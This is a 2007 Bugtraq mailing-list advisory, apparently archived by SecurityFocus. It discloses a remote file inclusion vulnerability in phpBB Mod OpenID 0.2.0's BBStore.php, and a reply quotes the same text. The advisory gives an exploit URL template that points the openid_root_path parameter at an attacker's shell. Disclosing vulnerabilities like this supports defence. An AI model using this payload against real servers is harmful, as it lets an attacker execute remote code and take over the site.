Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
Sep 30 2007 10:50PM
h3llcode hotmail it
(1 replies)
+++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ phpBB Mod OpenID 0.2.0 BBStore.php RFI
+ Risk: High
+ Found by Seph1roth
+ Site: http://blackroots.it
+
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Vulnerable Script Download: http://sourceforge.net/project/showfiles.php?group_id=178846
+ Exploit:
http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid
_root_path=[Shell]
[ reply ]
Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
Oct 01 2007 06:15PM
str0ke (str0ke milw0rm com)
Privacy Statement
Copyright 2009, SecurityFocus
+
+ phpBB Mod OpenID 0.2.0 BBStore.php RFI
+ Risk: High
+ Found by Seph1roth
+ Site: http://blackroots.it
+
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Vulnerable Script Download: http://sourceforge.net/project/showfiles.php?group_id=178846
+ Exploit:
http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid
_root_path=[Shell]
[ reply ]